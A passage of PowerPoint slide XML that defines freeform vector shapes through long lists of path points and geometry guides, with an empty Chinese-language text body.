                  <a:pt x="161" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="44" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="602" y="102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="602" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="102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lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1890">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 104"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="765917" y="3057101"/>
            <a:ext cx="2743676" cy="953871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 618 w 620"/>
              <a:gd name="T1" fmla="*/ 72 h 185"/>
              <a:gd name="T2" fmla="*/ 587 w 620"/>
              <a:gd name="T3" fmla="*/ 35 h 185"/>
              <a:gd name="T4" fmla="*/ 565 w 620"/>
              <a:gd name="T5" fmla="*/ 18 h 185"/>
              <a:gd name="T6" fmla="*/ 598 w 620"/>
              <a:gd name="T7" fmla="*/ 95 h 185"/>
              <a:gd name="T8" fmla="*/ 560 w 620"/>
              <a:gd name="T9" fmla="*/ 152 h 185"/>
              <a:gd name="T10" fmla="*/ 492 w 620"/>
              <a:gd name="T11" fmla="*/ 168 h 185"/>
              <a:gd name="T12" fmla="*/ 338 w 620"/>
              <a:gd name="T13" fmla="*/ 168 h 185"/>
              <a:gd name="T14" fmla="*/ 144 w 620"/>
              <a:gd name="T15" fmla="*/ 164 h 185"/>
              <a:gd name="T16" fmla="*/ 37 w 620"/>
              <a:gd name="T17" fmla="*/ 170 h 185"/>
              <a:gd name="T18" fmla="*/ 279 w 620"/>
              <a:gd name="T19" fmla="*/ 168 h 185"/>
              <a:gd name="T20" fmla="*/ 413 w 620"/>
              <a:gd name="T21" fmla="*/ 171 h 185"/>
              <a:gd name="T22" fmla="*/ 516 w 620"/>
              <a:gd name="T23" fmla="*/ 171 h 185"/>
              <a:gd name="T24" fmla="*/ 543 w 620"/>
              <a:gd name="T25" fmla="*/ 170 h 185"/>
              <a:gd name="T26" fmla="*/ 549 w 620"/>
              <a:gd name="T27" fmla="*/ 170 h 185"/>
              <a:gd name="T28" fmla="*/ 408 w 620"/>
              <a:gd name="T29" fmla="*/ 178 h 185"/>
              <a:gd name="T30" fmla="*/ 267 w 620"/>
              <a:gd name="T31" fmla="*/ 182 h 185"/>
              <a:gd name="T32" fmla="*/ 132 w 620"/>
              <a:gd name="T33" fmla="*/ 179 h 185"/>
              <a:gd name="T34" fmla="*/ 13 w 620"/>
              <a:gd name="T35" fmla="*/ 181 h 185"/>
              <a:gd name="T36" fmla="*/ 2 w 620"/>
              <a:gd name="T37" fmla="*/ 177 h 185"/>
              <a:gd name="T38" fmla="*/ 9 w 620"/>
              <a:gd name="T39" fmla="*/ 159 h 185"/>
              <a:gd name="T40" fmla="*/ 66 w 620"/>
              <a:gd name="T41" fmla="*/ 102 h 185"/>
              <a:gd name="T42" fmla="*/ 48 w 620"/>
              <a:gd name="T43" fmla="*/ 60 h 185"/>
              <a:gd name="T44" fmla="*/ 56 w 620"/>
              <a:gd name="T45" fmla="*/ 17 h 185"/>
              <a:gd name="T46" fmla="*/ 194 w 620"/>
              <a:gd name="T47" fmla="*/ 14 h 185"/>
              <a:gd name="T48" fmla="*/ 282 w 620"/>
              <a:gd name="T49" fmla="*/ 7 h 185"/>
              <a:gd name="T50" fmla="*/ 429 w 620"/>
              <a:gd name="T51" fmla="*/ 9 h 185"/>
              <a:gd name="T52" fmla="*/ 536 w 620"/>
              <a:gd name="T53" fmla="*/ 3 h 185"/>
              <a:gd name="T54" fmla="*/ 494 w 620"/>
              <a:gd name="T55" fmla="*/ 2 h 185"/>
              <a:gd name="T56" fmla="*/ 330 w 620"/>
              <a:gd name="T57" fmla="*/ 5 h 185"/>
              <a:gd name="T58" fmla="*/ 217 w 620"/>
              <a:gd name="T59" fmla="*/ 9 h 185"/>
              <a:gd name="T60" fmla="*/ 78 w 620"/>
              <a:gd name="T61" fmla="*/ 10 h 185"/>
              <a:gd name="T62" fmla="*/ 26 w 620"/>
              <a:gd name="T63" fmla="*/ 21 h 185"/>
              <a:gd name="T64" fmla="*/ 23 w 620"/>
              <a:gd name="T65" fmla="*/ 20 h 185"/>
              <a:gd name="T66" fmla="*/ 19 w 620"/>
              <a:gd name="T67" fmla="*/ 32 h 185"/>
              <a:gd name="T68" fmla="*/ 27 w 620"/>
              <a:gd name="T69" fmla="*/ 51 h 185"/>
              <a:gd name="T70" fmla="*/ 56 w 620"/>
              <a:gd name="T71" fmla="*/ 100 h 185"/>
              <a:gd name="T72" fmla="*/ 11 w 620"/>
              <a:gd name="T73" fmla="*/ 153 h 185"/>
              <a:gd name="T74" fmla="*/ 0 w 620"/>
              <a:gd name="T75" fmla="*/ 173 h 185"/>
              <a:gd name="T76" fmla="*/ 0 w 620"/>
              <a:gd name="T77" fmla="*/ 185 h 185"/>
              <a:gd name="T78" fmla="*/ 7 w 620"/>
              <a:gd name="T79" fmla="*/ 182 h 185"/>
              <a:gd name="T80" fmla="*/ 97 w 620"/>
              <a:gd name="T81" fmla="*/ 181 h 185"/>
              <a:gd name="T82" fmla="*/ 231 w 620"/>
              <a:gd name="T83" fmla="*/ 185 h 185"/>
              <a:gd name="T84" fmla="*/ 370 w 620"/>
              <a:gd name="T85" fmla="*/ 184 h 185"/>
              <a:gd name="T86" fmla="*/ 549 w 620"/>
              <a:gd name="T87" fmla="*/ 181 h 185"/>
              <a:gd name="T88" fmla="*/ 557 w 620"/>
              <a:gd name="T89" fmla="*/ 171 h 185"/>
              <a:gd name="T90" fmla="*/ 611 w 620"/>
              <a:gd name="T91" fmla="*/ 94 h 185"/>
              <a:gd name="T92" fmla="*/ 620 w 620"/>
              <a:gd name="T93" fmla="*/ 82 h 185"/>
              <a:gd name="T94" fmla="*/ 44 w 620"/>
              <a:gd name="T95" fmla="*/ 76 h 185"/>
              <a:gd name="T96" fmla="*/ 26 w 620"/>
              <a:gd name="T97" fmla="*/ 35 h 185"/>
              <a:gd name="T98" fmla="*/ 24 w 620"/>
              <a:gd name="T99" fmla="*/ 24 h 185"/>
              <a:gd name="T100" fmla="*/ 60 w 620"/>
              <a:gd name="T101" fmla="*/ 94 h 185"/>
              <a:gd name="T102" fmla="*/ 59 w 620"/>
              <a:gd name="T103" fmla="*/ 105 h 185"/>
              <a:gd name="T104" fmla="*/ 602 w 620"/>
              <a:gd name="T105" fmla="*/ 102 h 185"/>
              <a:gd name="T106" fmla="*/ 552 w 620"/>
              <a:gd name="T107" fmla="*/ 173 h 185"/>
              <a:gd name="T108" fmla="*/ 558 w 620"/>
              <a:gd name="T109" fmla="*/ 164 h 185"/>
              <a:gd name="T110" fmla="*/ 553 w 620"/>
              <a:gd name="T111" fmla="*/ 163 h 185"/>
              <a:gd name="T112" fmla="*/ 553 w 620"/>
              <a:gd name="T113" fmla="*/ 163 h 185"/>
              <a:gd name="T114" fmla="*/ 607 w 620"/>
              <a:gd name="T115" fmla="*/ 89 h 185"/>
              <a:gd name="T116" fmla="*/ 616 w 620"/>
              <a:gd name="T117" fmla="*/ 83 h 185"/>
              <a:gd name="T118" fmla="*/ 602 w 620"/>
              <a:gd name="T119" fmla="*/ 102 h 18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620" h="185">
                <a:moveTo>
                  <a:pt x="620" y="80"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="560" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563" y="163"/>
                </a:lnTo>
                <a:lnTo>
